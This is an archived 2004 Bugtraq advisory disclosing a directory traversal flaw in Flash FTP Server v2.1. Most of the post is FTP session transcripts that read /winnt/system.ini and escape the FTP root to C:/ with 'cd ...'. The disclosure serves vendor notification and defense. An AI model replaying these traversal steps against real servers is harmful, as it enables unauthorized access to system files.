[35815] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Bug@FlashFTPd

daemon@ATHENA.MIT.EDU (CoolICE)
Wed Jul 21 20:14:56 2004

Date: Wed, 21 Jul 2004 16:31:51 +0800
From: "CoolICE" <CoolICE@China.com>
Reply-To: CoolICE@China.com
To: "webmaster" <webmaster@net2soft.com>
Cc: "bugtraq" <bugtraq@securityfocus.com>, "list" <list@securiteam.com>
Mime-Version: 1.0
Content-Type: text/plain;
	charset="gb2312"
Content-Transfer-Encoding: 7bit
Message-ID: <vG959278837175.15409@mx1>

Application:	Flash FTP Server
Vendors:	http://www.net2soft.com/downloads/flashftpserver.exe
Version:	1.0(2.1?)
Platforms:	Windows
Bug:		Directory Traversal
Date:		2004-06-9
Author:		CoolICE
e-mail:		CoolICE#China.com
================
TestCode:
C:\>ftp localhost
Connected to server.
220 Flash FTP Server v2.1 ready...
User (server:(none)): CoolICE
331 Password required for CoolICE.
Password:
230 User CoolICE logged in.
ftp> get /winnt/system.ini
200 Port command successful.
150 Opening data connection for /winnt/system.ini.
226 File sent ok
ftp: 227 bytes received in 0.01Seconds 22.70Kbytes/sec
ftp>
--------------------------
C:\>ftp -d localhost
Connected to server.
220 Flash FTP Server v2.1 ready...
User (Server:(none)): anonymous
---> USER anonymous
331 Password required for anonymous.
Password:
---> PASS CoolICE@China.com
230 User anonymous logged in.
ftp> pwd
---> XPWD
257 "/C:/inetpub/ftproot/" is current directory.
ftp> cd /
---> CWD /
501 CWD failed. No permission
---> CWD ..
501 CWD failed. No permission
ftp> cd ...
---> CWD ...
250 CWD command successful. "C:/inetpub/ftproot/.../" is current directory.
ftp> cd /
---> CWD /
501 Cannot accept relative path using dot notation
ftp> pwd
---> XPWD
257 "/C:/" is current directory.


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[35815] in bugtraq

Bug@FlashFTPd

daemon@ATHENA.MIT.EDU (CoolICE)Wed Jul 21 20:14:56 2004

daemon@ATHENA.MIT.EDU (CoolICE)
Wed Jul 21 20:14:56 2004